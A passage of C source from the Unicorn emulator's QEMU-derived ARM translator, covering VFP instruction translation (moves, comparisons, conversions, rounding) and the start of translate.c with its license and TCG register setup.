tcg_const_i64(tcg_ctx, vfp_expand_imm(MO_64, a->imm)); for (;;) { neon_store_reg64(tcg_ctx, fd, vd); if (veclen == 0) { break; } /* Set up the operands for the next iteration */ veclen--; vd = vfp_advance_dreg(vd, delta_d); } tcg_temp_free_i64(tcg_ctx, fd); return true; } static bool trans_VMOV_reg_sp(DisasContext *s, arg_VMOV_reg_sp *a) { return do_vfp_2op_sp(s, tcg_gen_mov_i32, a->vd, a->vm); } static bool trans_VMOV_reg_dp(DisasContext *s, arg_VMOV_reg_dp *a) { return do_vfp_2op_dp(s, tcg_gen_mov_i64, a->vd, a->vm); } static bool trans_VABS_sp(DisasContext *s, arg_VABS_sp *a) { return do_vfp_2op_sp(s, gen_helper_vfp_abss, a->vd, a->vm); } static bool trans_VABS_dp(DisasContext *s, arg_VABS_dp *a) { return do_vfp_2op_dp(s, gen_helper_vfp_absd, a->vd, a->vm); } static bool trans_VNEG_sp(DisasContext *s, arg_VNEG_sp *a) { return do_vfp_2op_sp(s, gen_helper_vfp_negs, a->vd, a->vm); } static bool trans_VNEG_dp(DisasContext *s, arg_VNEG_dp *a) { return do_vfp_2op_dp(s, gen_helper_vfp_negd, a->vd, a->vm); } static void gen_VSQRT_sp(TCGContext *tcg_ctx, TCGv_i32 vd, TCGv_i32 vm) { gen_helper_vfp_sqrts(tcg_ctx, vd, vm, tcg_ctx->cpu_env); } static bool trans_VSQRT_sp(DisasContext *s, arg_VSQRT_sp *a) { return do_vfp_2op_sp(s, gen_VSQRT_sp, a->vd, a->vm); } static void gen_VSQRT_dp(TCGContext *tcg_ctx, TCGv_i64 vd, TCGv_i64 vm) { gen_helper_vfp_sqrtd(tcg_ctx, vd, vm, tcg_ctx->cpu_env); } static bool trans_VSQRT_dp(DisasContext *s, arg_VSQRT_dp *a) { return do_vfp_2op_dp(s, gen_VSQRT_dp, a->vd, a->vm); } static bool trans_VCMP_sp(DisasContext *s, arg_VCMP_sp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 vd, vm; if (!dc_isar_feature(aa32_fpsp_v2, s)) { return false; } /* Vm/M bits must be zero for the Z variant */ if (a->z && a->vm != 0) { return false; } if (!vfp_access_check(s)) { return true; } vd = tcg_temp_new_i32(tcg_ctx); vm = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, vd, a->vd); if (a->z) { tcg_gen_movi_i32(tcg_ctx, vm, 0); } else { neon_load_reg32(tcg_ctx, vm, a->vm); } if (a->e) { gen_helper_vfp_cmpes(tcg_ctx, vd, vm, tcg_ctx->cpu_env); } else { gen_helper_vfp_cmps(tcg_ctx, vd, vm, tcg_ctx->cpu_env); } tcg_temp_free_i32(tcg_ctx, vd); tcg_temp_free_i32(tcg_ctx, vm); return true; } static bool trans_VCMP_dp(DisasContext *s, arg_VCMP_dp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 vd, vm; if (!dc_isar_feature(aa32_fpdp_v2, s)) { return false; } /* Vm/M bits must be zero for the Z variant */ if (a->z && a->vm != 0) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. */ if (!dc_isar_feature(aa32_simd_r32, s) && ((a->vd | a->vm) & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } vd = tcg_temp_new_i64(tcg_ctx); vm = tcg_temp_new_i64(tcg_ctx); neon_load_reg64(tcg_ctx, vd, a->vd); if (a->z) { tcg_gen_movi_i64(tcg_ctx, vm, 0); } else { neon_load_reg64(tcg_ctx, vm, a->vm); } if (a->e) { gen_helper_vfp_cmped(tcg_ctx, vd, vm, tcg_ctx->cpu_env); } else { gen_helper_vfp_cmpd(tcg_ctx, vd, vm, tcg_ctx->cpu_env); } tcg_temp_free_i64(tcg_ctx, vd); tcg_temp_free_i64(tcg_ctx, vm); return true; } static bool trans_VCVT_f32_f16(DisasContext *s, arg_VCVT_f32_f16 *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr fpst; TCGv_i32 ahp_mode; TCGv_i32 tmp; if (!dc_isar_feature(aa32_fp16_spconv, s)) { return false; } if (!vfp_access_check(s)) { return true; } fpst = get_fpstatus_ptr(tcg_ctx, false); ahp_mode = get_ahp_flag(tcg_ctx); tmp = tcg_temp_new_i32(tcg_ctx); /* The T bit tells us if we want the low or high 16 bits of Vm */ tcg_gen_ld16u_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, vfp_f16_offset(a->vm, a->t)); gen_helper_vfp_fcvt_f16_to_f32(tcg_ctx, tmp, tmp, fpst, ahp_mode); neon_store_reg32(tcg_ctx, tmp, a->vd); tcg_temp_free_i32(tcg_ctx, ahp_mode); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, tmp); return true; } static bool trans_VCVT_f64_f16(DisasContext *s, arg_VCVT_f64_f16 *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr fpst; TCGv_i32 ahp_mode; TCGv_i32 tmp; TCGv_i64 vd; if (!dc_isar_feature(aa32_fpdp_v2, s)) { return false; } if (!dc_isar_feature(aa32_fp16_dpconv, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. */ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vd & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } fpst = get_fpstatus_ptr(tcg_ctx, false); ahp_mode = get_ahp_flag(tcg_ctx); tmp = tcg_temp_new_i32(tcg_ctx); /* The T bit tells us if we want the low or high 16 bits of Vm */ tcg_gen_ld16u_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, vfp_f16_offset(a->vm, a->t)); vd = tcg_temp_new_i64(tcg_ctx); gen_helper_vfp_fcvt_f16_to_f64(tcg_ctx, vd, tmp, fpst, ahp_mode); neon_store_reg64(tcg_ctx, vd, a->vd); tcg_temp_free_i32(tcg_ctx, ahp_mode); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, tmp); tcg_temp_free_i64(tcg_ctx, vd); return true; } static bool trans_VCVT_f16_f32(DisasContext *s, arg_VCVT_f16_f32 *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr fpst; TCGv_i32 ahp_mode; TCGv_i32 tmp; if (!dc_isar_feature(aa32_fp16_spconv, s)) { return false; } if (!vfp_access_check(s)) { return true; } fpst = get_fpstatus_ptr(tcg_ctx, false); ahp_mode = get_ahp_flag(tcg_ctx); tmp = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, tmp, a->vm); gen_helper_vfp_fcvt_f32_to_f16(tcg_ctx, tmp, tmp, fpst, ahp_mode); tcg_gen_st16_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, vfp_f16_offset(a->vd, a->t)); tcg_temp_free_i32(tcg_ctx, ahp_mode); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, tmp); return true; } static bool trans_VCVT_f16_f64(DisasContext *s, arg_VCVT_f16_f64 *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr fpst; TCGv_i32 ahp_mode; TCGv_i32 tmp; TCGv_i64 vm; if (!dc_isar_feature(aa32_fpdp_v2, s)) { return false; } if (!dc_isar_feature(aa32_fp16_dpconv, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. */ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vm & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } fpst = get_fpstatus_ptr(tcg_ctx, false); ahp_mode = get_ahp_flag(tcg_ctx); tmp = tcg_temp_new_i32(tcg_ctx); vm = tcg_temp_new_i64(tcg_ctx); neon_load_reg64(tcg_ctx, vm, a->vm); gen_helper_vfp_fcvt_f64_to_f16(tcg_ctx, tmp, vm, fpst, ahp_mode); tcg_temp_free_i64(tcg_ctx, vm); tcg_gen_st16_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, vfp_f16_offset(a->vd, a->t)); tcg_temp_free_i32(tcg_ctx, ahp_mode); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, tmp); return true; } static bool trans_VRINTR_sp(DisasContext *s, arg_VRINTR_sp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr fpst; TCGv_i32 tmp; if (!dc_isar_feature(aa32_vrint, s)) { return false; } if (!vfp_access_check(s)) { return true; } tmp = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, tmp, a->vm); fpst = get_fpstatus_ptr(tcg_ctx, false); gen_helper_rints(tcg_ctx, tmp, tmp, fpst); neon_store_reg32(tcg_ctx, tmp, a->vd); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, tmp); return true; } static bool trans_VRINTR_dp(DisasContext *s, arg_VRINTR_dp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr fpst; TCGv_i64 tmp; if (!dc_isar_feature(aa32_fpdp_v2, s)) { return false; } if (!dc_isar_feature(aa32_vrint, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. */ if (!dc_isar_feature(aa32_simd_r32, s) && ((a->vd | a->vm) & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } tmp = tcg_temp_new_i64(tcg_ctx); neon_load_reg64(tcg_ctx, tmp, a->vm); fpst = get_fpstatus_ptr(tcg_ctx, false); gen_helper_rintd(tcg_ctx, tmp, tmp, fpst); neon_store_reg64(tcg_ctx, tmp, a->vd); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i64(tcg_ctx, tmp); return true; } static bool trans_VRINTZ_sp(DisasContext *s, arg_VRINTZ_sp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr fpst; TCGv_i32 tmp; TCGv_i32 tcg_rmode; if (!dc_isar_feature(aa32_vrint, s)) { return false; } if (!vfp_access_check(s)) { return true; } tmp = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, tmp, a->vm); fpst = get_fpstatus_ptr(tcg_ctx, false); tcg_rmode = tcg_const_i32(tcg_ctx, float_round_to_zero); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); gen_helper_rints(tcg_ctx, tmp, tmp, fpst); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); neon_store_reg32(tcg_ctx, tmp, a->vd); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, tcg_rmode); tcg_temp_free_i32(tcg_ctx, tmp); return true; } static bool trans_VRINTZ_dp(DisasContext *s, arg_VRINTZ_dp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr fpst; TCGv_i64 tmp; TCGv_i32 tcg_rmode; if (!dc_isar_feature(aa32_fpdp_v2, s)) { return false; } if (!dc_isar_feature(aa32_vrint, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. */ if (!dc_isar_feature(aa32_simd_r32, s) && ((a->vd | a->vm) & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } tmp = tcg_temp_new_i64(tcg_ctx); neon_load_reg64(tcg_ctx, tmp, a->vm); fpst = get_fpstatus_ptr(tcg_ctx, false); tcg_rmode = tcg_const_i32(tcg_ctx, float_round_to_zero); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); gen_helper_rintd(tcg_ctx, tmp, tmp, fpst); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); neon_store_reg64(tcg_ctx, tmp, a->vd); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i64(tcg_ctx, tmp); tcg_temp_free_i32(tcg_ctx, tcg_rmode); return true; } static bool trans_VRINTX_sp(DisasContext *s, arg_VRINTX_sp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr fpst; TCGv_i32 tmp; if (!dc_isar_feature(aa32_vrint, s)) { return false; } if (!vfp_access_check(s)) { return true; } tmp = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, tmp, a->vm); fpst = get_fpstatus_ptr(tcg_ctx, false); gen_helper_rints_exact(tcg_ctx, tmp, tmp, fpst); neon_store_reg32(tcg_ctx, tmp, a->vd); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, tmp); return true; } static bool trans_VRINTX_dp(DisasContext *s, arg_VRINTX_dp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_ptr fpst; TCGv_i64 tmp; if (!dc_isar_feature(aa32_fpdp_v2, s)) { return false; } if (!dc_isar_feature(aa32_vrint, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. */ if (!dc_isar_feature(aa32_simd_r32, s) && ((a->vd | a->vm) & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } tmp = tcg_temp_new_i64(tcg_ctx); neon_load_reg64(tcg_ctx, tmp, a->vm); fpst = get_fpstatus_ptr(tcg_ctx, false); gen_helper_rintd_exact(tcg_ctx, tmp, tmp, fpst); neon_store_reg64(tcg_ctx, tmp, a->vd); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i64(tcg_ctx, tmp); return true; } static bool trans_VCVT_sp(DisasContext *s, arg_VCVT_sp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 vd; TCGv_i32 vm; if (!dc_isar_feature(aa32_fpdp_v2, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. */ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vd & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } vm = tcg_temp_new_i32(tcg_ctx); vd = tcg_temp_new_i64(tcg_ctx); neon_load_reg32(tcg_ctx, vm, a->vm); gen_helper_vfp_fcvtds(tcg_ctx, vd, vm, tcg_ctx->cpu_env); neon_store_reg64(tcg_ctx, vd, a->vd); tcg_temp_free_i32(tcg_ctx, vm); tcg_temp_free_i64(tcg_ctx, vd); return true; } static bool trans_VCVT_dp(DisasContext *s, arg_VCVT_dp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 vm; TCGv_i32 vd; if (!dc_isar_feature(aa32_fpdp_v2, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. */ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vm & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } vd = tcg_temp_new_i32(tcg_ctx); vm = tcg_temp_new_i64(tcg_ctx); neon_load_reg64(tcg_ctx, vm, a->vm); gen_helper_vfp_fcvtsd(tcg_ctx, vd, vm, tcg_ctx->cpu_env); neon_store_reg32(tcg_ctx, vd, a->vd); tcg_temp_free_i32(tcg_ctx, vd); tcg_temp_free_i64(tcg_ctx, vm); return true; } static bool trans_VCVT_int_sp(DisasContext *s, arg_VCVT_int_sp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 vm; TCGv_ptr fpst; if (!dc_isar_feature(aa32_fpsp_v2, s)) { return false; } if (!vfp_access_check(s)) { return true; } vm = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, vm, a->vm); fpst = get_fpstatus_ptr(tcg_ctx, false); if (a->s) { /* i32 -> f32 */ gen_helper_vfp_sitos(tcg_ctx, vm, vm, fpst); } else { /* u32 -> f32 */ gen_helper_vfp_uitos(tcg_ctx, vm, vm, fpst); } neon_store_reg32(tcg_ctx, vm, a->vd); tcg_temp_free_i32(tcg_ctx, vm); tcg_temp_free_ptr(tcg_ctx, fpst); return true; } static bool trans_VCVT_int_dp(DisasContext *s, arg_VCVT_int_dp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 vm; TCGv_i64 vd; TCGv_ptr fpst; if (!dc_isar_feature(aa32_fpdp_v2, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. */ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vd & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } vm = tcg_temp_new_i32(tcg_ctx); vd = tcg_temp_new_i64(tcg_ctx); neon_load_reg32(tcg_ctx, vm, a->vm); fpst = get_fpstatus_ptr(tcg_ctx, false); if (a->s) { /* i32 -> f64 */ gen_helper_vfp_sitod(tcg_ctx, vd, vm, fpst); } else { /* u32 -> f64 */ gen_helper_vfp_uitod(tcg_ctx, vd, vm, fpst); } neon_store_reg64(tcg_ctx, vd, a->vd); tcg_temp_free_i32(tcg_ctx, vm); tcg_temp_free_i64(tcg_ctx, vd); tcg_temp_free_ptr(tcg_ctx, fpst); return true; } static bool trans_VJCVT(DisasContext *s, arg_VJCVT *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 vd; TCGv_i64 vm; if (!dc_isar_feature(aa32_fpdp_v2, s)) { return false; } if (!dc_isar_feature(aa32_jscvt, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. */ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vm & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } vm = tcg_temp_new_i64(tcg_ctx); vd = tcg_temp_new_i32(tcg_ctx); neon_load_reg64(tcg_ctx, vm, a->vm); gen_helper_vjcvt(tcg_ctx, vd, vm, tcg_ctx->cpu_env); neon_store_reg32(tcg_ctx, vd, a->vd); tcg_temp_free_i64(tcg_ctx, vm); tcg_temp_free_i32(tcg_ctx, vd); return true; } static bool trans_VCVT_fix_sp(DisasContext *s, arg_VCVT_fix_sp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 vd, shift; TCGv_ptr fpst; int frac_bits; if (!dc_isar_feature(aa32_fpsp_v3, s)) { return false; } if (!vfp_access_check(s)) { return true; } frac_bits = (a->opc & 1) ? (32 - a->imm) : (16 - a->imm); vd = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, vd, a->vd); fpst = get_fpstatus_ptr(tcg_ctx, false); shift = tcg_const_i32(tcg_ctx, frac_bits); /* Switch on op:U:sx bits */ switch (a->opc) { case 0: gen_helper_vfp_shtos(tcg_ctx, vd, vd, shift, fpst); break; case 1: gen_helper_vfp_sltos(tcg_ctx, vd, vd, shift, fpst); break; case 2: gen_helper_vfp_uhtos(tcg_ctx, vd, vd, shift, fpst); break; case 3: gen_helper_vfp_ultos(tcg_ctx, vd, vd, shift, fpst); break; case 4: gen_helper_vfp_toshs_round_to_zero(tcg_ctx, vd, vd, shift, fpst); break; case 5: gen_helper_vfp_tosls_round_to_zero(tcg_ctx, vd, vd, shift, fpst); break; case 6: gen_helper_vfp_touhs_round_to_zero(tcg_ctx, vd, vd, shift, fpst); break; case 7: gen_helper_vfp_touls_round_to_zero(tcg_ctx, vd, vd, shift, fpst); break; default: g_assert_not_reached(); } neon_store_reg32(tcg_ctx, vd, a->vd); tcg_temp_free_i32(tcg_ctx, vd); tcg_temp_free_i32(tcg_ctx, shift); tcg_temp_free_ptr(tcg_ctx, fpst); return true; } static bool trans_VCVT_fix_dp(DisasContext *s, arg_VCVT_fix_dp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 vd; TCGv_i32 shift; TCGv_ptr fpst; int frac_bits; if (!dc_isar_feature(aa32_fpdp_v3, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. */ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vd & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } frac_bits = (a->opc & 1) ? (32 - a->imm) : (16 - a->imm); vd = tcg_temp_new_i64(tcg_ctx); neon_load_reg64(tcg_ctx, vd, a->vd); fpst = get_fpstatus_ptr(tcg_ctx, false); shift = tcg_const_i32(tcg_ctx, frac_bits); /* Switch on op:U:sx bits */ switch (a->opc) { case 0: gen_helper_vfp_shtod(tcg_ctx, vd, vd, shift, fpst); break; case 1: gen_helper_vfp_sltod(tcg_ctx, vd, vd, shift, fpst); break; case 2: gen_helper_vfp_uhtod(tcg_ctx, vd, vd, shift, fpst); break; case 3: gen_helper_vfp_ultod(tcg_ctx, vd, vd, shift, fpst); break; case 4: gen_helper_vfp_toshd_round_to_zero(tcg_ctx, vd, vd, shift, fpst); break; case 5: gen_helper_vfp_tosld_round_to_zero(tcg_ctx, vd, vd, shift, fpst); break; case 6: gen_helper_vfp_touhd_round_to_zero(tcg_ctx, vd, vd, shift, fpst); break; case 7: gen_helper_vfp_tould_round_to_zero(tcg_ctx, vd, vd, shift, fpst); break; default: g_assert_not_reached(); } neon_store_reg64(tcg_ctx, vd, a->vd); tcg_temp_free_i64(tcg_ctx, vd); tcg_temp_free_i32(tcg_ctx, shift); tcg_temp_free_ptr(tcg_ctx, fpst); return true; } static bool trans_VCVT_sp_int(DisasContext *s, arg_VCVT_sp_int *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 vm; TCGv_ptr fpst; if (!dc_isar_feature(aa32_fpsp_v2, s)) { return false; } if (!vfp_access_check(s)) { return true; } fpst = get_fpstatus_ptr(tcg_ctx, false); vm = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, vm, a->vm); if (a->s) { if (a->rz) { gen_helper_vfp_tosizs(tcg_ctx, vm, vm, fpst); } else { gen_helper_vfp_tosis(tcg_ctx, vm, vm, fpst); } } else { if (a->rz) { gen_helper_vfp_touizs(tcg_ctx, vm, vm, fpst); } else { gen_helper_vfp_touis(tcg_ctx, vm, vm, fpst); } } neon_store_reg32(tcg_ctx, vm, a->vd); tcg_temp_free_i32(tcg_ctx, vm); tcg_temp_free_ptr(tcg_ctx, fpst); return true; } static bool trans_VCVT_dp_int(DisasContext *s, arg_VCVT_dp_int *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 vd; TCGv_i64 vm; TCGv_ptr fpst; if (!dc_isar_feature(aa32_fpdp_v2, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist. */ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vm & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } fpst = get_fpstatus_ptr(tcg_ctx, false); vm = tcg_temp_new_i64(tcg_ctx); vd = tcg_temp_new_i32(tcg_ctx); neon_load_reg64(tcg_ctx, vm, a->vm); if (a->s) { if (a->rz) { gen_helper_vfp_tosizd(tcg_ctx, vd, vm, fpst); } else { gen_helper_vfp_tosid(tcg_ctx, vd, vm, fpst); } } else { if (a->rz) { gen_helper_vfp_touizd(tcg_ctx, vd, vm, fpst); } else { gen_helper_vfp_touid(tcg_ctx, vd, vm, fpst); } } neon_store_reg32(tcg_ctx, vd, a->vd); tcg_temp_free_i32(tcg_ctx, vd); tcg_temp_free_i64(tcg_ctx, vm); tcg_temp_free_ptr(tcg_ctx, fpst); return true; } /* * Decode VLLDM and VLSTM are nonstandard because: * * if there is no FPU then these insns must NOP in * Secure state and UNDEF in Nonsecure state * * if there is an FPU then these insns do not have * the usual behaviour that vfp_access_check() provides of * being controlled by CPACR/NSACR enable bits or the * lazy-stacking logic. */ static bool trans_VLLDM_VLSTM(DisasContext *s, arg_VLLDM_VLSTM *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 fptr; if (!arm_dc_feature(s, ARM_FEATURE_M) || !arm_dc_feature(s, ARM_FEATURE_V8)) { return false; } /* If not secure, UNDEF. */ if (!s->v8m_secure) { return false; } /* If no fpu, NOP. */ if (!dc_isar_feature(aa32_vfp, s)) { return true; } fptr = load_reg(s, a->rn); if (a->l) { gen_helper_v7m_vlldm(tcg_ctx, tcg_ctx->cpu_env, fptr); } else { gen_helper_v7m_vlstm(tcg_ctx, tcg_ctx->cpu_env, fptr); } tcg_temp_free_i32(tcg_ctx, fptr); /* End the TB, because we have updated FP control bits */ s->base.is_jmp = DISAS_UPDATE; return true; } �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/translate.c�����������������������������������������������������������0000664�0000000�0000000�00001416607�14675241067�0020400�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * ARM translation * * Copyright (c) 2003 Fabrice Bellard * Copyright (c) 2005-2007 CodeSourcery * Copyright (c) 2007 OpenedHand, Ltd. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "internals.h" #include "exec/exec-all.h" #include "tcg/tcg-op.h" #include "tcg/tcg-op-gvec.h" #include "qemu/log.h" #include "qemu/bitops.h" #include "arm_ldst.h" #include "exec/helper-proto.h" #include "exec/helper-gen.h" #define ENABLE_ARCH_4T arm_dc_feature(s, ARM_FEATURE_V4T) #define ENABLE_ARCH_5 arm_dc_feature(s, ARM_FEATURE_V5) /* currently all emulated v5 cores are also v5TE, so don't bother */ #define ENABLE_ARCH_5TE arm_dc_feature(s, ARM_FEATURE_V5) #define ENABLE_ARCH_5J dc_isar_feature(aa32_jazelle, s) #define ENABLE_ARCH_6 arm_dc_feature(s, ARM_FEATURE_V6) #define ENABLE_ARCH_6K arm_dc_feature(s, ARM_FEATURE_V6K) #define ENABLE_ARCH_6T2 arm_dc_feature(s, ARM_FEATURE_THUMB2) #define ENABLE_ARCH_7 arm_dc_feature(s, ARM_FEATURE_V7) #define ENABLE_ARCH_8 arm_dc_feature(s, ARM_FEATURE_V8) #define ARCH(x) do { if (!ENABLE_ARCH_##x) goto illegal_op; } while(0) #include "translate.h" #define IS_USER(s) (s->user) #include "exec/gen-icount.h" static const char * const regnames[] = { "r0", "r1", "r2", "r3", "r4", "r5", "r6", "r7", "r8", "r9", "r10", "r11", "r12", "r13", "r14", "pc" }; /* Function prototypes for gen_ functions calling Neon helpers. */ typedef void NeonGenThreeOpEnvFn(TCGContext *, TCGv_i32, TCGv_env, TCGv_i32, TCGv_i32, TCGv_i32); /* Function prototypes for gen_ functions for fix point conversions */ typedef void VFPGenFixPointFn(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32, TCGv_ptr); /* initialize TCG globals. */ void arm_translate_init(struct uc_struct *uc) { TCGContext *tcg_ctx = uc->tcg_ctx; int i; for (i = 0; i < 16; i++) { tcg_ctx->cpu_R[i] = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUARMState, regs[i]), regnames[i]); } tcg_ctx->cpu_CF = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUARMState, CF), "CF"); tcg_ctx->cpu_NF = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUARMState, NF), "NF"); tcg_ctx->cpu_VF = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUARMState, VF), "VF"); tcg_ctx->cpu_ZF = tcg_global_mem_new_i32(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUARMState, ZF), "ZF"); tcg_ctx->cpu_exclusive_addr = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUARMState, exclusive_addr), "exclusive_addr"); tcg_ctx->cpu_exclusive_val = tcg_global_mem_new_i64(tcg_ctx, tcg_ctx->cpu_env, offsetof(CPUARMState, exclusive_val), "exclusive_val"); a64_translate_init(uc); } /* Flags for the disas_set_da_iss info argument: * lower bits hold the Rt register number, higher bits are flags. */ typedef enum ISSInfo { ISSNone = 0, ISSRegMask = 0x1f, ISSInvalid = (1 << 5), ISSIsAcqRel = (1 << 6), ISSIsWrite = (1 << 7), ISSIs16Bit = (1 << 8), } ISSInfo; /* Save the syndrome information for a Data Abort */ static void disas_set_da_iss(DisasContext *s, MemOp memop, ISSInfo issinfo) { uint32_t syn; int sas = memop & MO_SIZE; bool sse = memop & MO_SIGN; bool is_acqrel = issinfo & ISSIsAcqRel; bool is_write = issinfo & ISSIsWrite; bool is_16bit = issinfo & ISSIs16Bit; int srt = issinfo & ISSRegMask; if (issinfo & ISSInvalid) { /* Some callsites want to conditionally provide ISS info, * eg "only if this was not a writeback" */ return; } if (srt == 15) { /* For AArch32, insns where the src/dest is R15 never generate * ISS information. Catching that here saves checking at all * the call sites. */ return; } syn = syn_data_abort_with_iss(0, sas, sse, srt, 0, is_acqrel, 0, 0, 0, is_write, 0, is_16bit); disas_set_insn_syndrome(s, syn); } static inline int get_a32_user_mem_index(DisasContext *s) { /* Return the core mmu_idx to use for A32/T32 "unprivileged load/store" * insns: * if PL2, UNPREDICTABLE (we choose to implement as if PL0) * otherwise, access as if at PL0. */ switch (s->mmu_idx) { case ARMMMUIdx_E2: /* this one is UNPREDICTABLE */ case ARMMMUIdx_E10_0: case ARMMMUIdx_E10_1: case ARMMMUIdx_E10_1_PAN: return arm_to_core_mmu_idx(ARMMMUIdx_E10_0); case ARMMMUIdx_SE3: case ARMMMUIdx_SE10_0: case ARMMMUIdx_SE10_1: case ARMMMUIdx_SE10_1_PAN: return arm_to_core_mmu_idx(ARMMMUIdx_SE10_0); case ARMMMUIdx_MUser: case ARMMMUIdx_MPriv: return arm_to_core_mmu_idx(ARMMMUIdx_MUser); case ARMMMUIdx_MUserNegPri: case ARMMMUIdx_MPrivNegPri: return arm_to_core_mmu_idx(ARMMMUIdx_MUserNegPri); case ARMMMUIdx_MSUser: case ARMMMUIdx_MSPriv: return arm_to_core_mmu_idx(ARMMMUIdx_MSUser); case 